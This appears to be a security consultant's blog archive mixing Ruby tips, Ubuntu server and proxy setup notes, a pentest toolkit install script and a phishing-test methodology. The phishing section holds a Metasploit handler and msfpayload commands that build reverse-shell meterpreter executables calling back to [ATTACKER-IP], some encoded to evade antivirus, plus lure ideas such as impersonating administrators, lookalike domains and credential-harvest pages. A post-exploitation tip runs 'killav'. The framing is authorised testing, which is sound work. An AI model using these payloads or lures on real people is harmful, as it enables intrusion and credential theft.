searching ruby source code

contributing to open source? need to search & understand ruby code faster? This bash function should save you some time. I use it at least 50-60 times a day.

Stick this in your .bashrc:

function rgrep() {
   find -L . -type f -name \*.rb -exec grep -n -i -H --color "$1" {} \;
}

Use like: $ rgrep "something"

ruby hash per-value defaults

Here’s a quick tip for assigning default values with a ruby hash. It’s well publicized that you can set an overall default for the hash (I think this is called “default assignment”) with the .default method like this (stolen directly from the rubydocs):

h = Hash.new                            #=> {}
h.default                               #=> nil
h.default(2)                            #=> nil

h = Hash.new("cat")                     #=> {}
h.default                               #=> "cat"
h.default(2)                            #=> "cat"

h = Hash.new {|h,k| h[k] = k.to_i*10}   #=> {}
h.default                               #=> 0
h.default(2)                            #=> 20

But you can also set per-key defaults using the or-operator. If an assigned value is false or nil, you’ll get the default value instead. See below:

ruby-1.9.1-p378 > x = {}
=> value: {}
ruby-1.9.1-p378 > x[:y] = "y"
=> value: "y"
ruby-1.9.1-p378 > x[:y]
=> value: "y"
ruby-1.9.1-p378 > x[:y] = "y" || "noty"
=> value: "y"
ruby-1.9.1-p378 > x[:y]
=> value: "y"
ruby-1.9.1-p378 > x[:y] = nil || "noty"
=> value: "noty"
ruby-1.9.1-p378 > x[:y] = false || "noty"
=> value: "noty"
ruby-1.9.1-p378 > x[:y] = "" || "noty"
=> value: ""

… Note that or-assignment doesn’t work in this case:

ruby-1.9.1-p378 > x[:y] = "" ||= "noty"
SyntaxError: (irb):19: syntax error, unexpected tOP_ASGN, expecting $end
x[:y] = "" ||= "noty"
^
from /home/jcran/.rvm/rubies/ruby-1.9.1-p378/bin/irb:17:in `<main>'
ruby-1.9.1-p378 >
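The same defaults worked through as an added example (not code from the original post). It also goes a little beyond the post: it shows the block-form default, the shared-object trap with Hash.new([]), and that or-assignment does parse when written as h[key] ||= fallback rather than x[:y] = "" ||= "noty".

```ruby
# Added example (not from the original post) covering the kinds of hash
# default the post shows, plus the working form of or-assignment.

# Hash.new(value): every miss returns the same object. Fine for an
# immutable default like 0, which makes a clean word counter.
def count_words(words)
  counts = Hash.new(0)
  words.each { |w| counts[w] += 1 }
  counts
end

# The trap with a mutable default: Hash.new([]) hands out one shared Array.
# `<<` appends to that shared array and never stores anything under the key,
# so the hash stays empty while the default silently accumulates values.
def group_with_shared_default(pairs)
  groups = Hash.new([])
  pairs.each { |key, value| groups[key] << value }
  groups
end

# Hash.new { |h, k| ... }: the block runs on each miss, builds a fresh
# default and stores it, which is what you actually want for grouping.
def group_with_block_default(pairs)
  groups = Hash.new { |h, k| h[k] = [] }
  pairs.each { |key, value| groups[key] << value }
  groups
end

# `value || fallback` (the post's per-key default) only replaces nil and
# false; "" and 0 are truthy in Ruby and pass through untouched.
def or_default(value, fallback = "noty")
  value || fallback
end

# Or-assignment written as `hash[key] ||= fallback` does parse (the post's
# SyntaxError came from `x[:y] = "" ||= "noty"`) and assigns only when the
# current value is nil or false, or the key is missing.
def fill_missing(hash, key, fallback = "noty")
  hash[key] ||= fallback
  hash
end

if $PROGRAM_NAME == __FILE__
  p count_words(%w[a b a])                        # {"a"=>2, "b"=>1}
  p group_with_shared_default([[:x, 1], [:y, 2]]) # {}  (nothing was stored)
  p group_with_block_default([[:x, 1], [:y, 2]])  # {:x=>[1], :y=>[2]}
  p or_default(false), or_default("")             # "noty", ""
  p fill_missing({ y: false }, :y)                # {:y=>"noty"}
end
```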

10 min project hosting & sharing

Need a simple way to backup (and share) local files & scripts? Yeah yeah, another svn/websvn howto – but my brain sucks, and i forget this stuff if i don’t write it down…

The only prereqs to this quick howto are that you have an ubuntu box and you know a thing or two about subversion. Preferably a shellhost – I use slicehost and i’ve heard great things about linode.com.

I use svn for many of my projects, and for my toolkit. Tonight i needed to quickly and securely share a few files from that toolkit, so i stuck websvn on a host, and configured htaccess authentication. Total time? 10 min. Here’s the setup.

(Yes, i know the cool kids are all on git now)

  • Create subversion repository in /var/svn
cd /var/svn
svnadmin create repository
  • Install apache / websvn (apt-get install)
$ apt-get install apache2 websvn
  • Configure websvn – this is handled with the debian package, so when you’re done, your config (/etc/websvn/svn_deb_conf.inc) should look like this
<?php
// please edit /etc/websvn/config.php
// or use dpkg-reconfigure websvn
$config->parentPath("/var/svn/");
$config->addRepository("repository", "file:///var/svn/repository");
$config->setEnscriptPath("/usr/bin");
$config->setSedPath("/bin");
$config->useEnscript();
?>
  • Create htpasswd file
$ htpasswd -c -s /var/svn/htaccess testuser
  • Configure htpasswd in apache config (/etc/websvn/apache.conf)
# Configuration for websvn using php4.
Alias /websvn /usr/share/websvn
<Directory /usr/share/websvn>
DirectoryIndex index.php
Options FollowSymLinks
Order allow,deny
Allow from all
AuthType Basic
AuthName "Subversion Repository"
Require valid-user
AuthUserFile /var/svn/htaccess
<IfModule mod_php4.c>
php_flag magic_quotes_gpc Off
php_flag track_vars On
</IfModule>
</Directory>
  • Restart Apache and you’re done.
$ /etc/init.d/apache2 restart

scrape scrape scrape

totally half-finished thought. maybe it’ll spawn an idea for you… there are a zillion+1 ways to scrape information from the web these days. here’s the easiest i’ve found:

require 'nokogiri'
require 'open-uri'
require 'tidy_ffi'

class CrappyScraper

  attr_accessor :doc

  # Fetch a Google results page for the keyword and print each result title.
  # The keyword is URL-encoded first so spaces or '&' in it can't break, or
  # add parameters to, the query string.
  def search(keyword)
    query = URI.encode_www_form_component(keyword)
    @doc = Nokogiri::HTML(URI.open("http://www.google.com/search?q=" + query))

    @doc.xpath('//h3/a').each do |node|
      puts node.text
    end
  end

  # Fetch any page and print the text of every link sitting inside a span.
  # URI.open only handles URLs, unlike the bare Kernel#open of older open-uri,
  # which would run a command if handed a string starting with '|'.
  def scrape(url)
    @doc = Nokogiri::HTML(URI.open(url))

    @doc.xpath('//span/a').each do |node|
      puts node.text
    end
  end

  # Write the document to a file after cleaning it up with HTML Tidy.
  def write_clean(filename)
    File.open(filename, 'w') { |f| f.write(to_s) }
  end

  # The tidied HTML of the current document.
  def to_s
    TidyFFI::Tidy.new(@doc.to_s).clean
  end

  # Write the document as Nokogiri parsed it, without tidying.
  def write(filename)
    File.open(filename, 'w') { |f| f.write(@doc.to_s) }
  end
end

x = CrappyScraper.new
x.search('cowabunga')
puts x.to_s

Apt-proxy installation notes

No big secret that i’m a huge fan of ubuntu as a pentesting platform, and run it as my main OS. Recently I’ve had enough systems to justify tossing in an apt-proxy installation. Nothing groundbreaking, but may save a few mins for you. Here’re my notes.

SERVER CONFIGURATION:

Choose an (ubuntu) machine to install apt-proxy on:

$ sudo apt-get install apt-proxy

After the install, edit the /etc/apt-proxy/apt-proxy-v2.conf file to configure your listening address:

address = [internal listening address]

Restart the apt-proxy daemon:

$ sudo /etc/init.d/apt-proxy restart

That’s it for the server.

CLIENT:

Setting a client up to use the proxy requires editing a few lines of your /etc/apt/sources.list. The Apt-proxy howto (https://help.ubuntu.com/community/AptProxy) gives a good example:

Replace mentions of specific repository URLs (in /etc/apt/sources.list) with references to your server and the backend for it, such as:

deb http://archive.ubuntu.com/ubuntu karmic main restricted
deb http://security.ubuntu.com/ubuntu karmic-security main restricted universe

would become:

deb http://server:9999/ubuntu karmic main restricted
deb http://server:9999/ubuntu-security karmic-security main restricted universe

Pretty straightforward. Just make sure you append the “-security” piece onto the proxy URL for both security and updates. In the case of my /etc/apt/sources.list:

# standard packages
deb http://[internal listening address]:9999/ubuntu karmic main restricted universe multiverse
deb-src http://[internal listening address]:9999/ubuntu karmic main restricted universe multiverse

# update packages
deb http://[internal listening address]:9999/ubuntu karmic-updates main restricted universe multiverse
deb-src http://[internal listening address]:9999/ubuntu karmic-updates main restricted universe multiverse

# security packages
deb http://[internal listening address]:9999/ubuntu-security karmic-security main restricted universe multiverse
deb-src http://[internal listening address]:9999/ubuntu-security karmic-security main restricted universe multiverse

Run an apt-get update / apt-get upgrade and you’re golden. Rinse & repeat for all clients.
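An added example (not from the original post or the Ubuntu howto) that applies the rewrite above to a whole sources.list: archive.ubuntu.com lines (main and -updates) are pointed at the ubuntu backend and security.ubuntu.com lines at ubuntu-security, while comments and other mirrors are left alone. PROXY_HOST is a placeholder for your internal listening address, and the sample sources.list is constructed, not taken from a real box.

```ruby
# Added example, not from the original post: rewrite Ubuntu sources.list
# lines so the archives go through an apt-proxy on PROXY_HOST:9999.

PROXY_HOST = "PROXY_HOST"   # placeholder: your apt-proxy's internal address
PROXY_PORT = 9999

# Upstream mirror -> apt-proxy backend name. -updates lives on
# archive.ubuntu.com, so it goes through "ubuntu"; only security.ubuntu.com
# needs the "ubuntu-security" backend.
BACKENDS = {
  "archive.ubuntu.com/ubuntu"  => "ubuntu",
  "security.ubuntu.com/ubuntu" => "ubuntu-security",
}

# Rewrite a single line. Comments, blank lines and mirrors that have no
# configured backend (e.g. PPAs) pass through unchanged.
def proxify_line(line)
  m = line.match(%r{\A(deb(?:-src)?)\s+https?://([^\s/]+/ubuntu)(\s.*)\z})
  return line unless m
  backend = BACKENDS[m[2]]
  return line unless backend
  "#{m[1]} http://#{PROXY_HOST}:#{PROXY_PORT}/#{backend}#{m[3]}"
end

# Rewrite a whole sources.list, preserving line order.
def proxify(text)
  text.lines.map { |l| proxify_line(l.chomp) }.join("\n") + "\n"
end

# Constructed sample sources.list (not from a real system).
SAMPLE = <<~LIST
  # standard packages
  deb http://archive.ubuntu.com/ubuntu karmic main restricted
  deb-src http://archive.ubuntu.com/ubuntu karmic main restricted
  deb http://archive.ubuntu.com/ubuntu karmic-updates main restricted
  deb http://security.ubuntu.com/ubuntu karmic-security main restricted universe
  deb http://ppa.launchpad.net/example/ppa/ubuntu karmic main
LIST

puts proxify(SAMPLE) if $PROGRAM_NAME == __FILE__
```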

Cheers!

Scripting Post-Exploitation

A common question that comes up with post-exploitation is the need to run multiple things when a meterpreter session is initiated.

You can easily run a single command using the ‘AutoRunScript’ option. For example:

msf (psexec) > set AutoRunScript killav

However, if you need multiple things to run, there’re a couple multi-runner scripts that you should know about: multiscript, multicommand, and multi_console_command. They can take either a -c or a -rc option, which will provide the list of items to run. These scripts were provided by dark0perator.

Sidenote: If you’re using the multi* scripts, it’s better to use the -rc option. The parsing for the multi-command scripts doesn’t handle spaces well.

msf (psexec) > set AutoRunScript multi_console_command -c 'command, command, command' ## Don't do this

It’s much better to use an external rc file where commands.rc is just a list of commands one-per-line like:

help
run killav
migrate
shutdown

Then call it like:

msf (psexec) > set AutoRunScript multi_console_command -rc commands.rc

Another (non-recommended) trick, if you only need two scripts to run, is to also set the InitialAutoRunScript option, i.e. 'set InitialAutoRunScript killav'. Generally, though, InitialAutoRunScript shouldn’t be touched except by exploits: it’s intended for exploits that know the target process is going to die, so they can migrate first. <-- bad idea (according to egyp7).

Thoughts on Recommendations (Prevention vs Detection & Reaction)

I started thinking about some of the findings we make and the recommendations around them – and how unrealistic we’re being as penetration testers. Take ‘Information Leakage’ for instance. How plausible is it to prevent ALL information leakage? Is that something that we should be asking clients to strive for? What about the best use of their time / resources? Wouldn’t that time be better spent monitoring for anomalous events in general?

What about the social engineering findings where we demonstrate that it’s possible to gather internal company usernames? Is there realistically any way to /prevent/ username enumeration? Well, yes, but at what cost / effort? Are we really asking folks to prevent their usernames from reaching the outside world — and what are they thinking when they read that?? Aren’t we just reporting this as an informational thing? (I think so.) I mean, we’re calling for PREVENTION here, but what about the other aspects of security, Detection / Reaction? Wouldn’t it make more sense to recommend clients spend those resources monitoring for mass email blasts from an external address, or for anomalous activity on the internal network?

I think there’s an open question here on how to fit detection / reaction testing into penetration-testing in a meaningful way.

I’ll choose to do business with a company that’s put effort into detection and reaction capabilities as opposed to 100% prevention any day.

Related: http://www.amazon.com/review/product/0962870048/ref=dp_top_cm_cr_acr_txt/104-2922720-6943154?_encoding=UTF8&showViewpoints=1

Testing your susceptibility to phishing attacks – Are your technical controls helping?

Phishing is one of those things people either love or hate (a lot of it depends on which side of the water you’re on). That said, the subject of phishing tends to make most admins nervous, as they /know/ their users are going to be susceptible. In my experience, that’s true. However, there are a lot of technical controls that can help prevent phishers from being successful. This methodology was developed to help test those technical controls. It’s a work in progress, but I want to get it out there for your use.

Attack Methodology (Theory)

The purpose of this attack methodology is to provide a repeatable way to test a client’s susceptibility to attacks sent over email. The attack methodology progressively increases in cleverness / technical ability of the attack. It aims to test not only the user’s awareness of a social engineering attack, but also the controls which prevent such attacks.

Many security controls are now involved when sending a simple email. A list of some of those controls:

  • Public Availability of Email Addresses / Sensitive Information
  • MX Configuration
    • Relaying Allowed?
    • MX Reputation Filtering?
  • Spam Filtering Capabilities
    • Client-Side
    • Server-Side
  • Spam Neutering Capabilities
    • Client-Side – disables links
    • Server-Side – disables links, disables binaries
  • Antivirus Capabilities
    • Client-Side – quarantines / deletes binaries
    • Server-Side -
  • Firewall Configuration
    • Inbound Traffic
    • Outbound Traffic
  • Traffic Proxying

Ways in which we can influence the success of the attack:

  • Spoof the sending email address
  • Source from a more reputable MX
  • make the binary look less malicious
    • Encode, or encrypt it to bypass AV
  • remove the binary, and place a link
    • ensure the binary connects back (rather than doing a bindshell <-- you’d be dumb to do this [NAT])
      • ensure the binary uses proxy settings (passiveX)
    • send a link containing the malicious payload in an xss vector
    • send a link containing the malicious payload in a /stored/ xss vector

Email Sources:

  • Gmail / Hotmail / Other Free Email Service
  • Register similar-sounding domain, use your mailserver
  • Known (Compromised) Email Server on client’s domain
  • Other Known Email Server
  • Unknown Email Server – Attacker’s box

Social Engineering Plausibility (This is a whole subject in its own right):

  • Send a single link
  • Send a link w/ a story
  • Send a link w/ a story from “the security department” / “the administrator” / <Authority Figure>
  • Send a link w/ a story from <Insert Administrator’s Name here>
    • Better yet, get his actual sig
  • Send a link from a “friend”
    • harvest from myspace / twitter / etc
  • Register new account under known friend’s name, steal their picture / info, send a new link.
  • Set up a site to host “security patches” or “new improved notepad.exe”, send a link

Payload Types:

  • binary
    • malicious connect-back binary or script (unencrypted) —– test AV
    • malicious connect-back binary or script (encrypted) –/
    • malicious file (exploiting vulnerability in target’s system)
      • Adobe PDF
      • Flash FLV
      • Microsoft DOCX,PPTX,XLSX, etc
  • link
    • to page asking for personal information (email passwords – OWA)
    • to page w/ malicious binary (to be downloaded)
    • to page w/ an exploit (metasploit is good here)
    • to page w/ malicious exploit pack (multiple binaries tried via javascript – browser auto_pwn)
    • to page w/ malicious active-x control (passive-x)
    • to page w/ beef hook (can be encoded)
    • to reflected xss w/ beef
    • to stored xss containing beef

(add google analytics to any of these for easy tracking of victims)

Attack Methodology (Practical)

Payloads

  • Prepare payloads
    • Prepare handler (on [ATTACKER-IP]) – listening on :443 so we avoid most egress filtering… :
      • ./toolkit/nix/framework-net/metasploit-svn/msfconsole
        use exploit/multi/handler
        set ExitOnSession false
        set PAYLOAD windows/meterpreter/reverse_tcp
        set LHOST [ATTACKER-IP]
        set LPORT 443
        save
        exploit -j
    • connect back, unencrypted:
      • ./toolkit/nix/framework-net/metasploit-svn/msfpayload windows/meterpreter/reverse_tcp LHOST=[ATTACKER-IP] LPORT=443 R| ./toolkit/nix/framework-net/metasploit-svn/msfencode -t exe -e generic/none -o unencrypted.exe;
    • connect back, encrypted:
      • ./toolkit/nix/framework-net/metasploit-svn/msfpayload windows/meterpreter/reverse_tcp LHOST=[ATTACKER-IP] LPORT=443 R| ./toolkit/nix/framework-net/metasploit-svn/msfencode -t exe -o encrypted.exe;
    • google analytics
    • beef hook script
    • beef hook via xss

Server

  • Prepare Email Servers
    • Register <Client>.Security@gmail.com (or some similar Gmail address)
    • Setup Local MX
      • utilize SEF, or some other form of Perl::MIME
    • Prepare Remotely-Accessible MX
    • Register Client Domains

Now that you’ve prepared, you can use each server type, to send each payload type.

Using GMAIL

  • Send unencrypted binary (TEST-1)
  • Send encrypted binary (TEST-2)
  • Send link to page w/ script (TEST-3)

What this tests

  • Spam Filtering
  • Content Filtering

Using a Local (Unknown to target) MX

  • Send unencrypted binary (TEST-4)
  • Send encrypted binary (TEST-5)
  • Send link to page w/ script (TEST-6)

What this tests

This shouldn’t make it through.

  • Spam Filtering
  • Content Filtering
  • MX Reputation Analysis

Using a known, valid MX

  • Register domain (similar to target)
  • Set domain MX records to remotely-accessible mail server
  • Send unencrypted binary (TEST-7)
  • Send encrypted binary (TEST-8)
  • Send link to page w/ script (TEST-9)

What this tests

This will likely make it through.

  • Spam Filtering
  • Content Filtering
  • MX Reputation Analysis

Using a Target-owned MX

  • Search for any internal relays
    • repeat above steps, sending through internal relay

What this tests

  • Spam Issues

Measuring Success

For a pentest, it’s useful to know as much information about the clients as possible. You also want some way to maintain access.

  • What you don’t want:
    • Multiple connect-backs to a single netcat listener
  • What you do want:
    • Users entering their information
    • Meterpreter payloads, with a handler waiting for connect-backs
    • Google Analytics

References

https://help.ubuntu.com/community/PostfixBasicSetupHowto – Postfix on ubuntu / debian

what should be considered a vulnerability?

…And now, a rant.

What should be considered (and reported) as a vulnerability when auditing a network?

Is weak network architecture a vulnerability? What if I can hit a critical server from an unprotected workstation? Isn’t that a vulnerability? Can we detect it?

What are today’s vulnerability scanners doing to detect bad management practices? Users w/ local administrator? Admins in the same segment as untrusted contractors? Windows servers / workstations with the same password?

Isn’t that a vulnerability? (hint – pass-the-hash)

What are scanners doing to detect insufficient technical controls? In the face of current (phishing, malware, etc) threats, should lack of egress filtering and lack of a proxy be considered a vulnerability? Should automated tools be picking this up and pointing it out?

pentesting with an ubuntu box

here’s a recent drop of a script i use to configure my ubuntu box for pentesting. yes, i could use backtrack (and i do — especially if i’m having wireless issues), but this is a quick way to get an ubuntu box up & running. cheers -jcran

#!/bin/bash

# System Configuration & Utilities
apt-get -y install build-essential
apt-get -y install linux-headers-`uname -r`
apt-get -y install sysvconfig
apt-get -y install bum         ## Boot-Up Manager
apt-get -y install tofrodos    ## DOS utils
apt-get -y install xinetd      ## why not.
apt-get -y install unrar       ## RAR support
apt-get -y install p7zip-full  ## 7-Zip support
apt-get -y install fcrackzip   ## Zip cracking
apt-get -y install ipcalc      ## handy
apt-get -y install sharutils   ## uuencode / uudecode
apt-get -y install xclip       ## piping is handy
apt-get -y install ldap-utils
apt-get -y install cabextract  ## damn microsoft and their fascist compression formats!
apt-get -y install g++
apt-get -y install ssh

## Network services
apt-get -y install samba
apt-get -y install nis
apt-get -y install nfs
apt-get -y install smbfs       ## samba utilities
## apt-get -y install tftpd    ## you need to modify the /etc/init.d file...

# system monitoring
apt-get -y install ntop        ##
apt-get -y install sysstat     ## iostat,sar,mpstat
apt-get -y install procinfo

# Package Management
#apt-get -y install apt-build
#apt-get -y install apt-dpkg-ref
#apt-get -y install apt-listbugs
apt-get -y install apt-file
#apt-get -y install apt-howto
apt-get -y install apt-utils
apt-get -y install apt-listchanges
apt-get -y install dconf

# Terminal Emulators
apt-get -y install tn5250
apt-get -y install screen

# Filesystem Support
apt-get -y install sshfs
apt-get -y install ntfs-3g
apt-get -y install ntfs-config
apt-get -y install ntfsprogs
apt-get -y install mkisofs

# Gnome-Specific Configuration
apt-get -y install gconf
apt-get -y install gnomebaker
apt-get -y install nautilus-open-terminal

# ISAKMPD
# apt-get -y install isakmpd
apt-get -y install vpnc

# Multimedia
apt-get -y install amarok
apt-get -y install xmms
apt-get -y install xmms-skins
apt-get -y install xmms-mp4
apt-get -y install mpg123
apt-get -y install totem-xine
apt-get -y install ksnapshot
apt-get -y install istanbul
apt-get -y install recordmydesktop
apt-get -y install gtk-recordmydesktop
apt-get -y install xvidcap

# Basics

# Netcat & Tunnelling
apt-get -y install netcat
apt-get -y install sbd
apt-get -y install cryptcat
apt-get -y install socat
apt-get -y install vtun
apt-get -y install stunnel

# Scanning Tools
apt-get -y install nmap
apt-get -y install nessusd
apt-get -y install nessus
apt-get -y install fping
apt-get -y install hping2
apt-get -y install hping3
apt-get -y install scapy
apt-get -y install snmp
#apt-get -y install sing     #send icmp nasty garbage
apt-get -y install traceroute
apt-get -y install tcptraceroute
apt-get -y install ike-scan ## ipsec vpn tool
apt-get -y install nbtscan ## cifs info tool
apt-get -y install sslscan

# Passive Scanning Tools
apt-get -y install p0f
apt-get -y install pads

# Sniffing Tools
apt-get -y install wireshark
apt-get -y install ettercap
apt-get -y install ettercap-gtk
apt-get -y install tcpdump
apt-get -y install tcpflow
apt-get -y install ssldump
apt-get -y install nemesis   # packet injection
apt-get -y install dsniff
apt-get -y install etherape

# Libraries
apt-get -y install libssl        #Medusa
apt-get -y install libssl-dev        #Medusa
apt-get -y install libssh-2        #Medusa
apt-get -y install python-pycurl    #wfuzz
apt-get -y install libnet-dns-perl    #fierce.pl
apt-get -y install libsnmp-perl        #??
apt-get -y install libcrypt-ssleay-perl #HEAD,GET,POST, libwhisker
apt-get -y install libnet-ssleay-perl   # ""     ""
apt-get -y install ncurses-dev        # kismet-newcore
apt-get -y install libpcap-dev        # kismet-newcore

# Cracking Tools
apt-get -y install john
apt-get -y install medusa
## apt-get -y install hydra? ## not really that useful..

# Wireless Tools
##apt-get -y install kismet ## disabled because of kismet-ng
apt-get -y install aircrack
apt-get -y install aircrack-ng

# App Layer Tools
apt-get -y install wget
apt-get -y install curl
apt-get -y install nikto

## Scripting
apt-get -y install ruby
apt-get -y install python
apt-get -y install perl
apt-get -y install perl-doc
apt-get -y install gawk
apt-get -y install vim-ruby
apt-get -y install vim-python

## Ruby - Gems
apt-get -y install gems
apt-get -y install rubygems

## Metasploit dependencies
apt-get -y install libopenssl-ruby
apt-get -y install ruby-libglade2
apt-get -y install libgtk2-ruby

## Scapy - Python Dependencies - http://www.secdev.org/projects/scapy/portability.html
apt-get -y install graphviz        # graph stuff
apt-get -y install imagemagick        # graph stuff
apt-get -y install python-gnuplot    # PacketList.plot()
apt-get -y install python-crypto    # WEP Stuff
apt-get -y install python-visual    # 3D Stuff
apt-get -y install python-pyx        # pdfdump() / psdump()
apt-get -y install acroread
apt-get -y install gv
apt-get -y install sox

## ProxyStrike Dependencies
apt-get -y install python-qt4
apt-get -y install python-openssl

## W3af Dependencies
apt-get -y install python-pyparsing
apt-get -y install python-pydot
apt-get -y install python-soappy

## Coding
##apt-get -y install eclipse - get the latest version...
apt-get -y install kdevelop
apt-get -y install subversion
apt-get -y install rapidsvn
apt-get -y install vim-full
apt-get -y install git
apt-get -y install git-core

## Documentation
apt-get -y install notecase
apt-get -y install vim
apt-get -y install liferea

## Web / Browser Utilities
apt-get -y install azureus
apt-get -y install opera
apt-get -y install filezilla
apt-get -y install flashplugin-nonfree
apt-get -y install pidgin
apt-get -y install pidgin-otr
apt-get -y install thunderbird
apt-get -y install lightning-extension
apt-get -y install enigmail
apt-get -y install irssi
apt-get -y install silc
apt-get -y install tor

## Windows Stuff
apt-get -y install wine
apt-get -y install quicksynergy

## Encryption
apt-get -y install dmsetup
apt-get -y install password-gorilla
apt-get -y install gpa
apt-get -y install seahorse

## Java
apt-get -y install sun-java6-jre
apt-get -y install sun-java6-plugin

#set our java version to java-6-sun as this plays well with burpsuite
update-java-alternatives -s java-6-sun

## Upgrade & Such
apt-get update
apt-get upgrade
apt-get dist-upgrade

## Remove auto-start services
update-rc.d -f exim4 remove
update-rc.d -f tor remove
update-rc.d -f ntop remove
update-rc.d -f p0f remove ## not sure this is necessary
update-rc.d -f pads remove
update-rc.d -f isakmpd remove
update-rc.d -f nessusd remove
update-rc.d -f cups remove
update-rc.d -f samba remove
update-rc.d -f nis remove
update-rc.d -f nfs-common remove

### Manual installs
### ------------------------------------------------------------------------------------------
### truecrypt -- http://www.howtogeek.com/howto/ubuntu/install-truecrypt-on-ubuntu-edgy/
###            - you will need the linux kernel source for this one...
### onesixtyone -- http://www.phreedom.org/solar/onesixtyone/
### libdvdcss2 -- "sudo /usr/share/doc/libdvdread3/./install-css.sh"